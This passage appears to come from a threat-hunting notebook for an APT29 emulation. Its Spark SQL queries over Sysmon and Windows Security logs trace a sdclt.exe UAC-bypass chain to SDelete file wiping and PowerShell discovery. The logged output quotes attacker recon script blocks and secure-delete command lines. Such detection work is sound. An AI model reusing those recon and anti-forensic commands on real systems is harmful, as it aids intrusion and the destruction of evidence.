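# powershell.exe hop is handled the same way as the others.
query = '''
SELECT Message
FROM apt29Host h
INNER JOIN (
  SELECT f.ProcessGuid
  FROM apt29Host f
  INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND LOWER(d.Image) LIKE '%powershell.exe'
  ) e
  ON f.ParentProcessGuid = e.ProcessGuid
  WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%draft.zip%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND h.EventID in (12,13)
  AND LOWER(h.TargetObject) RLIKE '.*\\\\\\\\software\\\\\\\\sysinternals\\\\\\\\sdelete.*'

'''
# `spark` is the notebook-provided SparkSession; `df` is reused by the cells that follow.
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)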
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:03:14.702
ProcessGuid: {47ab858c-e2f2-5eac-d203-000000000400}
ProcessId: 8760
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete\EulaAccepted
Details: DWORD (0x00000001) 
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:03:14.702
ProcessGuid: {47ab858c-e2f2-5eac-d203-000000000400}
ProcessId: 8760
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:03:14.702
ProcessGuid: {47ab858c-e2f2-5eac-d203-000000000400}
ProcessId: 8760
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            

Query ID:5A19E46B-8328-4867-81CF-87518A3784B1

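# 4.B.3 (Security log): the SDelete process chain rebuilt from Windows Security EventID 4688
# (process creation). 4688 carries no ProcessGuid, so each hop joins the child's creator
# ProcessId to the parent's NewProcessId:
#   b: control.exe whose parent process is sdclt.exe
#   a: child of b with MandatoryLabel S-1-16-12288 (High) and TokenElevationType %%1937
#      (the "Type 2" elevated token described in the event text)
#   d: powershell.exe child of a
#   f: child of d named *sdelete* with "draft.zip" on the command line
# The command-line pattern ends in '%' so a trailing quote or extra argument after the file
# name does not defeat the match (the sibling Sysmon cells use the same '%draft.zip%' form).
# Channel, process names and command lines are compared lower-cased because Spark SQL
# equality/LIKE is case-sensitive; the powershell.exe hop is wrapped like the rest.
query = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
SELECT d.NewProcessId
FROM apt29Host d
INNER JOIN(
  SELECT a.ProcessId, a.NewProcessId
  FROM apt29Host a
  INNER JOIN (
    SELECT NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
        AND LOWER(NewProcessName) LIKE "%control.exe"
        AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
  ) b
  ON a.ProcessId = b.NewProcessId
  WHERE LOWER(a.Channel) = "security"
    AND a.EventID = 4688
    AND a.MandatoryLabel = "S-1-16-12288"
    AND a.TokenElevationType = "%%1937"
) c
ON d.ProcessId = c.NewProcessId
WHERE LOWER(d.Channel) = "security"
  AND d.EventID = 4688
  AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON f.ProcessId = e.NewProcessId
WHERE LOWER(f.Channel) = "security"
AND f.EventID = 4688
AND LOWER(f.NewProcessName) LIKE '%sdelete%'
AND LOWER(f.CommandLine) LIKE '%draft.zip%'

'''
# `spark` is the notebook-provided SparkSession; `df` is reused by the cells that follow.
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)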
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x2238
	New Process Name:	C:\Program Files\SysinternalsSuite\sdelete64.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xf24
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\Users\pbeesly\AppData\Roaming\Draft.Zip

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

4.B.4. File Deletion

Procedure: Deleted SysinternalsSuite.zip on disk using SDelete

Criteria: sdelete64.exe deleting the file SysinternalsSuite.zip

Detection Type: Telemetry (Correlated)

Query ID:83D62033-105A-4A02-8B75-DAB52D8D51EC

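# 4.B.4 (Sysmon file delete): Sysmon EventID 23 (FileDelete) events, plus the deleting
# process's command line, for the SDelete process that referenced SysinternalsSuite.zip.
# Subquery g reconstructs the process chain from Sysmon EventID 1 rows, innermost first:
#   b: control.exe whose parent image is sdclt.exe
#   a: child of b created at IntegrityLevel = "High"
#   d: powershell.exe child of a
#   f: child of d whose Image contains "sdelete" and whose CommandLine contains
#      "sysinternalssuite.zip"
# The outer query joins g.ProcessGuid to the FileDelete events of that same process.
# Spark SQL LIKE is case-sensitive, so each Image/CommandLine operand is lower-cased first; the
# powershell.exe hop is wrapped in LOWER() like the rest of the chain.
query = '''
SELECT Message, g.CommandLine
FROM apt29Host h
INNER JOIN (
  SELECT f.ProcessGuid, f.CommandLine
  FROM apt29Host f
  INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND LOWER(d.Image) LIKE '%powershell.exe'
  ) e
  ON f.ParentProcessGuid = e.ProcessGuid
  WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%sysinternalssuite.zip%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND h.EventID = 23

'''
# `spark` is the notebook-provided SparkSession; `df` is reused by the cells that follow.
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)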
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message     | File Delete:
RuleName: -
UtcTime: 2020-05-02 03:03:37.794
ProcessGuid: {47ab858c-e305-5eac-d303-000000000400}
ProcessId: 8848
User: DMEVALS\pbeesly
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetFilename: C:\Users\pbeesZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.ZZZ
Hashes: SHA1=A51DE96F19B0314067CCDD2D2A08C316367DC313,MD5=F86BF68DB45C99EDEBBB554A2091D272,SHA256=C0CE8A9099929ABF3728A9E050371EC80133EB3987A2374D9268789B50F05272,IMPHASH=00000000000000000000000000000000
IsExecutable: false
Archived: true 
 CommandLine | "C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\Users\pbeesly\Downloads\SysinternalsSuite.zip                                                                                                                                                                                                                                                                                                                                                                                                                       

Query ID:AC2ECFF0-D817-4893-BDED-F16B837C4DBA

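# 4.B.4 (Sysmon registry): registry events (EventID 12 = key create/delete, EventID 13 =
# value set) written by the SDelete process that referenced SysinternalsSuite.zip.
# Subquery g is the same Sysmon EventID 1 process chain as the previous cell (sdclt.exe ->
# control.exe -> High-integrity child -> powershell.exe -> sdelete with
# "sysinternalssuite.zip" on the command line); the outer query joins its ProcessGuid to
# registry events whose TargetObject matches ...\software\sysinternals\sdelete.
# Backslashes in the RLIKE pattern are doubled twice — once for the Python string, once for
# Spark's string parsing — so the regex engine receives "\\", an escaped literal backslash.
# LOWER() wraps every LIKE/RLIKE operand because Spark SQL matching is case-sensitive; the
# powershell.exe hop is handled the same way as the others.
query = '''
SELECT Message
FROM apt29Host h
INNER JOIN (
  SELECT f.ProcessGuid
  FROM apt29Host f
  INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND LOWER(d.Image) LIKE '%powershell.exe'
  ) e
  ON f.ParentProcessGuid = e.ProcessGuid
  WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%sysinternalssuite.zip%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND h.EventID in (12,13)
  AND LOWER(h.TargetObject) RLIKE '.*\\\\\\\\software\\\\\\\\sysinternals\\\\\\\\sdelete.*'

'''
# `spark` is the notebook-provided SparkSession; `df` is reused by the cells that follow.
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)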
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:03:33.997
ProcessGuid: {47ab858c-e305-5eac-d303-000000000400}
ProcessId: 8848
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete\EulaAccepted
Details: DWORD (0x00000001) 
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:03:33.997
ProcessGuid: {47ab858c-e305-5eac-d303-000000000400}
ProcessId: 8848
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:03:33.997
ProcessGuid: {47ab858c-e305-5eac-d303-000000000400}
ProcessId: 8848
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            

Query ID:4D6DE690-E92C-4D60-93E6-8E5C7C4DF143

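# 4.B.4 (Security log): the SDelete process chain rebuilt from Windows Security EventID 4688
# (process creation). 4688 carries no ProcessGuid, so each hop joins the child's creator
# ProcessId to the parent's NewProcessId:
#   b: control.exe whose parent process is sdclt.exe
#   a: child of b with MandatoryLabel S-1-16-12288 (High) and TokenElevationType %%1937
#      (the "Type 2" elevated token described in the event text)
#   d: powershell.exe child of a
#   f: child of d named *sdelete* with "sysinternalssuite.zip" on the command line
# The command-line pattern ends in '%' so a trailing quote or extra argument after the file
# name does not defeat the match (the sibling Sysmon cells use the same
# '%sysinternalssuite.zip%' form).
# Channel, process names and command lines are compared lower-cased because Spark SQL
# equality/LIKE is case-sensitive; the powershell.exe hop is wrapped like the rest.
query = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
SELECT d.NewProcessId
FROM apt29Host d
INNER JOIN(
  SELECT a.ProcessId, a.NewProcessId
  FROM apt29Host a
  INNER JOIN (
    SELECT NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
        AND LOWER(NewProcessName) LIKE "%control.exe"
        AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
  ) b
  ON a.ProcessId = b.NewProcessId
  WHERE LOWER(a.Channel) = "security"
    AND a.EventID = 4688
    AND a.MandatoryLabel = "S-1-16-12288"
    AND a.TokenElevationType = "%%1937"
) c
ON d.ProcessId = c.NewProcessId
WHERE LOWER(d.Channel) = "security"
  AND d.EventID = 4688
  AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON f.ProcessId = e.NewProcessId
WHERE LOWER(f.Channel) = "security"
AND f.EventID = 4688
AND LOWER(f.NewProcessName) LIKE '%sdelete%'
AND LOWER(f.CommandLine) LIKE '%sysinternalssuite.zip%'

'''
# `spark` is the notebook-provided SparkSession; `df` is reused by the cells that follow.
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)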
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x2290
	New Process Name:	C:\Program Files\SysinternalsSuite\sdelete64.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xf24
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\Users\pbeesly\Downloads\SysinternalsSuite.zip

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

4.C.1. File and Directory Discovery

Procedure: Enumerated user’s temporary directory path using PowerShell

Criteria: powershell.exe executing $env:TEMP

Detection Type: Telemetry (Correlated)

Query ID:85BFD73C-875E-4208-AD9E-1922D4D4D991

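# 4.C.1 (PowerShell script block logging): return the PowerShell EventID 4104 script blocks
# that reference $env:TEMP and were executed by the powershell.exe instance belonging to the
# elevated sdclt.exe -> control.exe chain. Subquery e rebuilds that chain from Sysmon
# EventID 1 rows, innermost first:
#   b: control.exe whose parent image is sdclt.exe
#   a: child of b created at IntegrityLevel = "High"
#   d: powershell.exe child of a  (its decimal Sysmon ProcessId is what e returns)
# The outer query joins e.ProcessId to the 4104 event's ExecutionProcessID, which is also a
# decimal PID, so no hex conversion is needed here (unlike the Security-log variant).
# Spark SQL LIKE is case-sensitive, so Image and ScriptBlockText are lower-cased before
# matching; the powershell.exe hop is wrapped in LOWER() like the other image matches.
query = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:temp%"

'''
# `spark` is the notebook-provided SparkSession; `df` is reused by the cells that follow.
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)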
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID: D18CF7B9-CBF0-40CE-9D07-12DC83AF3B2F

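# Query ID D18CF7B9-CBF0-40CE-9D07-12DC83AF3B2F
# Security-log (EventID 4688) variant: returns PowerShell script-block text
# (EventID 4104) that references $env:TEMP and was logged by a powershell.exe
# whose lineage is sdclt.exe -> control.exe -> elevated child -> powershell.exe.
#
# Join chain (all Security 4688 unless noted):
#   b: control.exe created by sdclt.exe
#   a: process created by b (a.ProcessId, the creator id, equals b.NewProcessId),
#      running at MandatoryLabel S-1-16-12288 (High) with TokenElevationType
#      %%1937 (TokenElevationTypeFull, a fully elevated token)
#   d: powershell.exe created by a
#   f: Microsoft-Windows-PowerShell/Operational 4104 emitted by d's process
#
# Process-id normalisation: 4688 records NewProcessId as a "0x..." hex string,
# while 4104's ExecutionProcessID is numeric, so d's value is split on "0x"
# and f's is rendered with hex() and lowered before the final join.
#
# d.NewProcessName is lowered before the LIKE, matching the sibling
# NewProcessName/ParentProcessName predicates, so a mixed-case path in the
# log (Windows paths are not case-sensitive) is not silently excluded.
#
# "%$env:temp%" is a plain substring match on the lowered script text and
# would match benign scripts on its own; the lineage join is what narrows it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:temp%"

'''
)
# Full, untruncated Message column per record; the script block is multi-line.
df.show(100, truncate=False, vertical=True)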
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.2. System Owner/User Discovery

Procedure: Enumerated the current username using PowerShell

Criteria: powershell.exe executing $env:USERNAME

Detection Type: Telemetry (Correlated)

Query ID: A45F53ED-65CB-4739-A4D3-F2B0F08F86F8

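# Query ID A45F53ED-65CB-4739-A4D3-F2B0F08F86F8
# Sysmon variant: returns PowerShell script-block text (EventID 4104) that
# references $env:USERNAME and was logged by a powershell.exe whose lineage is
# sdclt.exe -> control.exe -> High-integrity child -> powershell.exe.
#
# Join chain (all Sysmon EventID 1 unless noted):
#   b: control.exe whose ParentImage is sdclt.exe
#   a: process whose ParentProcessGuid is b's ProcessGuid, IntegrityLevel "High"
#   d: powershell.exe whose ParentProcessGuid is a's ProcessGuid
#   f: Microsoft-Windows-PowerShell/Operational 4104 whose ExecutionProcessID
#      equals d.ProcessId (both numeric, so no hex conversion is needed here)
#
# d.Image is lowered before the LIKE, matching the sibling Image/ParentImage
# predicates, so a mixed-case path in the log (Windows paths are not
# case-sensitive) is not silently excluded.
#
# "%$env:username%" is a plain substring match on the lowered script text and
# would match benign scripts on its own; the lineage join is what narrows it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:username%"

'''
)
# Full, untruncated Message column per record; the script block is multi-line.
df.show(100, truncate=False, vertical=True)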
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Invoke-Command -ComputerName NASHUA -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId

ScriptBlock ID: 806f4593-7cce-4e2c-8645-8cb798c3bedd
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------